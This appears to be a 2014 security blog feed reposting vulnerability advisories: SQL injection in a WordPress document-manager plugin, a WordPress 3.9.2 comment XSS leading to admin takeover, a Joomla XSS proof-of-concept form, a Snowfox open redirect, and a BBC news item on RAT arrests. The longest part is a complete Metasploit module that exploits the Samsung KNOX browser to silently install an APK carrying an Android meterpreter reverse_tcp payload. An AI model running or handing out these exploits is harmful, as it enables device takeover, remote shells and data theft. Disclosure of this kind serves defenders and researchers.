            echo "SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")"."\n";
            $r     = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")", ARRAY_A);
 
 
 
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
 
function download_project()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where pid = $user_ID  order by date desc", ARRAY_A);
        $r_project   = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID  ", ARRAY_A);
        $return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
        $zip         = new Zip();
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
 
function download_archive()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
        $return_file = "Account.zip";
        $zip         = new Zip();
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where uid = $user_ID  order by date desc", ARRAY_A);
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
 
    function remove_cat()
    {
        global $wpdb, $current_user;
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . "  ");
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . "  ");
}  
 
 
::DISCLOSURE::
+ 10/30/2014: Notify to vendor - vendor does not response
+ 11/08/2014: Notify to vendor - Vendor blocks IPs from Vietnam
+ 11/05/2014: Notify to vendor - vendor does not response
+ 11/20/2014: Public information
 
::REFERENCE::
https://www.youtube.com/watch?v=AR3xCcuEJHc
 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

(43)

21Nov/140

WordPress 3.9.2 Cross Site Scripting

 
OVERVIEW
========
 
A security flaw in WordPress 3 allows injection of JavaScript into certain text fields. In particular, the problem affects comment boxes on WordPress posts and pages. These don't require authentication by default.
 
The JavaScript injected into a comment is executed when the target user views it, either on a blog post, a page, or in the Comments section of the administrative Dashboard.
 
In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue. The exploit is not then visible to normal users, search engines, etc.
 
When a blog administrator goes to the Dashboard/Comments section to review new comments, the JavaScript gets executed. The script can then perform operations with administrator privileges.
 
For instance, our PoC exploits first clean up traces of the injected script from the database, then perform other administrative tasks such as changing the current user's password, adding a new administrator account, or using the plugin editor to write attacker-supplied PHP code on the server (this
impact applies to any WordPress XSS if triggered by an administrator).
 
These operations happen in the background without the user seeing anything out of ordinary.
 
If the attacker writes new PHP code on the server via the plugin editor,
another AJAX request can be used to execute it instantaneously, whereby the attacker gains operating system level access on the server.
 
The exploit will NOT be triggered directly at the Dashboard "root view" because only snippets (20 first words) of the latest comments are shown there with all HTML stripped.
 
If approved there, the exploit will be triggered by any user viewing the targeted blog posting or page, with their corresponding privileges.
 
Plugins that let unprivileged users to enter HTML text may offer other
attack vectors.
 
DETAILS
=======
 
WordPress allows a few HTML tags in comments, such as the anchor <A>, bold <B>, and code <CODE> tags. Certain white-listed attributes are allowed in each tag. Obviously, the "href" attribute is important for anchor tags, but e.g. the "onmouseover" attribute would be undesirable.
 
The problem occurs in a text formatting function called wptexturize() which is normally executed for each comment and other blocks of text. The function replaces certain simple characters with fancier HTML entities. For instance, straight quote symbols are replaced with opening and closing
curly quotes, unicode 8220 and 8221.
 
In order to avoid interfering with HTML formatting, wptexturize() first splits the text in segments. The splitting is expected to pick HTML tags (which aren't texturized) apart from running text (which is texturized).
 
In addition to HTML tags, the code is supposed to recognize square-bracketed shortcodes such as [CODE] and avoid texturizing them.
 
The splitting is implemented with a regular expression in
wp-includes/formatting.php:
 
   $textarr = preg_split('/(<.*>|\[.*\])/Us', $text, -1,
                         PREG_SPLIT_DELIM_CAPTURE);
 
A text containing carefully mixed square and angle brackets confuses the
splitting process and results in HTML code getting partially texturized.
 
An attacker can exploit the bug to supply any attributes in the allowed
HTML tags. A style attribute can be used to create a transparent tag
covering the whole window, forcing the execution of its onmouseover handler.
 
In practical applications the script would probably first remove the
transparent tag to avoid interfering with UI events and re-triggering
the handler.
It could then insert a new <SCRIPT> tag to load a more complex JavaScript
file to execute from another web server. This script can use e.g. jQuery to
chain AJAX operations for posting HTML forms and retrieving the required
nonces.
 
AFFECTED VERSIONS
=================
 
We tested a few WordPress versions from 3.0 to the latest 3.9.2.
All tested versions were vulnerable.
The problem seems to have gone uncorrected for almost four years.
 
Version 4.0 uses a different kind of regular expression and is NOT
vulnerable to this problem.
 
WORKAROUNDS
===========
 
Texturizing can be easily disabled by adding a return statement in the
beginning of the function in wp-includes/formatting.php:
 
  function wptexturize($text) {
        return $text;                  // ADD THIS LINE
        global $wp_cockneyreplace;
 
This changes how some punctuation marks look like but the difference is
quite minor.
 
We have also made a WordPress plugin available for disabling texturization.
For more information and an up-to-date version of this document, please refer
to our website http://klikki.fi
 
The preferred solution should be applying the official patch released by WordPress.
 
VENDOR RESPONSE
===============
 
WordPress was notified on September 26 and has released patches correcting
the problem. The WordPress security advisory is available at
 
https://wordpress.org/news/2014/11/wordpress-4-0-1/
 
CREDITS
=======
 
The vulnerability was discovered and researched by Jouko Pynnonen, KlikkiOy, Finland.
 
--
Jouko Pynnonen <jouko@iki.fi>
Klikki Oy - http://klikki.fi

(55)

21Nov/140

Computer hijacking arrests in UK and across Europe

Computer hijacking arrests in UK and across Europe

Fifteen people have been arrested, including four in the UK, in connection with the hijacking of computers.

Police say the individuals were using software designed to remotely control computers - allowing for the stealing of information.

The other arrests were made in Estonia, France, Romania, Latvia, Italy, and Norway.

The practice, which in some instances can grant access to a victim's webcam, is known as "Ratting".

The phrase takes its name from the malicious software used to gain control - Remote Access Trojans (Rats).

Using Rats to view people through their own webcams, without their knowledge, is becoming "increasingly common" according to the UK government-backed Get Safe Online advice website.

The National Crime Agency (NCA) said it arrested two 33-year-old men, and a 30-year-old woman, in Leeds.

A 20-year-old man was arrested in Chatham, Kent, while a 19-year-old man had his home searched in Liverpool and was brought in for "voluntary questioning".

They are all accused of knowingly using Rats to spy on multiple targets.

"Victims are typically infected by being convinced to click on a link purporting to be a picture or video, or disguised as a legitimate file, but is instead an installer for the Rat," the NCA explained in a statement.

"In many cases, those who unwittingly install such trojans will have no indication that their machine is infected."

Fonte: http://www.bbc.com/news/technology-30146176
(52)

20Nov/140

Joomla Simple Email Form 1.8.5 Cross Site Scripting

Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in Simple Email Form Joomla Extension, which can be exploited to perform Cross-Site Scripting (XSS) attacks against visitors and administrators of Joomla websites with installed plugin.
 
 
1) Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension: CVE-2014-8539
 
Input passed via the "mod_simpleemailform_field2_1" HTTP POST parameter to "/index.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
 
 
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="mod_simpleemailform_field1_1" value="email@email.com">
<input type="hidden" name="mod_simpleemailform_field2_1" value='"><script>alert("immuniweb");</script>'>
<input type="hidden" name="mod_simpleemailform_submit_1" value="Submit">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Disclosure timeline:
2014-10-29 Vendor Alerted via emails.
2014-11-06 Vendor Alerted via emails.
2014-11-14 Fix Requested via emails.
2014-11-17 Fix Requested via emails.
2014-11-19 Public disclosure with self-written patch.
 
Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23241-patch.zip
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23241 - https://www.htbridge.com/advisory/HTB23241 - Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension.
[2] Simple Email Form Joomla Extension - http://extensions.joomla.org/extensions/contacts-and-feedback/contact-forms/11494 - Lightweight email contact form with 8 configurable fields, plus a field for uploading attachments to the email, and a CAPTCHA based in Text_CAPTCHA from the PEAR library (included).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

(68)

19Nov/140

Snowfox CMS 1.0 Open Redirect

Snowfox CMS v1.0 (rd param) Open Redirect Vulnerability
 
 
Vendor: Globiz Solutions
Product web page: http://www.snowfoxcms.org
Affected version: 1.0
 
Summary: Snowfox is an open source Content Management System (CMS)
that allows your website users to create and share content based
on permission configurations.
 
Desc: Input passed via the 'rd' GET parameter in 'selectlanguage.class.php'
script is not properly verified before being used to redirect users. This
can be exploited to redirect a user to an arbitrary website e.g. when a user
clicks a specially crafted link to the affected script hosted on a trusted
domain.
 
===========================================================================
\modules\system\controller\selectlanguage.class.php:
----------------------------------------------------
 
28: if ($results && isset($inputs['rd'])){
29:      header("location: ".$inputs['rd']);
30: }
31: return $results;
 
===========================================================================
 
Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
Advisory ID: ZSL-2014-5206
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5206.php
 
12.11.2014
 
--
 
http://10.0.18.3/snowfox/?uri=user/select-language&formAction=submit&rd=http://www.zeroscience.mk&languageId=us-en

(79)

18Nov/140

Samsung Galaxy KNOX Android Browser Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'digest/md5'
 
class Metasploit3 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  # Hash that maps payload ID -> (0|1) if an HTTP request has
  # been made to download a payload of that ID
  attr_reader :served_payloads
 
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
      'Description'         => %q{
        A vulnerability exists in the KNOX security component of the Samsung Galaxy
        firmware that allows a remote webpage to install an APK with arbitrary
        permissions by abusing the 'smdm://' protocol handler registered by the KNOX
        component.
 
        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
        and Ace 4.
      },
      'License'             => MSF_LICENSE,
      'Author'              => [
        'Andre Moulu', # discovery and advisory
        'joev'   # msf module
      ],
      'References'          => [
        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
        ['OSVDB', '114590']
      ],
      'Platform'            => 'android',
      'Arch'                => ARCH_DALVIK,
      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
      'Targets'             => [ [ 'Automatic', {} ] ],
      'DisclosureDate'      => 'Nov 12 2014',
      'DefaultTarget'       => 0,
 
      'BrowserRequirements' => {
        :source     => 'script',
        :os_name    => OperatingSystems::Match::ANDROID
      }
    ))
 
    register_options([
      OptString.new('APK_VERSION', [
        false, "The update version to advertise to the client", "1337"
      ])
    ], self.class)
 
    deregister_options('JsObfuscate')
  end
 
  def exploit
    @served_payloads = Hash.new(0)
    super
  end
 
  def apk_bytes
    payload.encoded
  end
 
  def on_request_uri(cli, req)
    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
      if req.method.upcase == 'HEAD'
        print_status "Serving metadata..."
        send_response(cli, '', magic_headers)
      else
        print_status "Serving payload '#{$1}'..."
        @served_payloads[$1] = 1
        send_response(cli, apk_bytes, magic_headers)
      end
    elsif req.uri =~ /_poll/
      vprint_debug "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
      send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
    elsif req.uri =~ /launch$/
      send_response_html(cli, launch_html)
    else
      super
    end
  end
 
  # The browser appears to be vulnerable, serve the exploit
  def on_request_exploit(cli, req, browser)
    print_status "Serving exploit..."
    send_response_html(cli, generate_html)
  end
 
  def magic_headers
    { 'Content-Length' => apk_bytes.length,
      'ETag' => Digest::MD5.hexdigest(apk_bytes),
      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
  end
 
  def generate_html
    %Q|
      <!doctype html>
      <html><body>
      <script>
      #{exploit_js}
      </script></body></html>
    |
  end
 
  def exploit_js
    payload_id = rand_word
 
    js_obfuscate %Q|
 
      function poll() {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
        xhr.onreadystatechange = function(){
          if (xhr.readyState == 4) {
            if (xhr.responseText == '1') {
              setTimeout(killEnrollment, 100);
            } else {
              setTimeout(poll, 1000);
              setTimeout(enroll, 0);
              setTimeout(enroll, 500);
            }
          }
        };
        xhr.onerror = function(){
          setTimeout(poll, 1000);
          setTimeout(enroll, 0);
        };
        xhr.send();
      }
 
      function enroll() {
        var loc = window.location.href.replace(/[/.]$/g, '');
        top.location = 'smdm://#{rand_word}?update_url='+
          encodeURIComponent(loc)+'/#{payload_id}.apk';
      }
 
      function killEnrollment() {
        top.location = "intent://#{rand_word}?program="+
          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
        setTimeout(launchApp, 300);
      }
 
      function launchApp() {
        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
      }
 
      enroll();
      setTimeout(poll,600);
 
    |
  end
 
  def rand_word
    Rex::Text.rand_text_alphanumeric(3+rand(12))
  end
end

(160)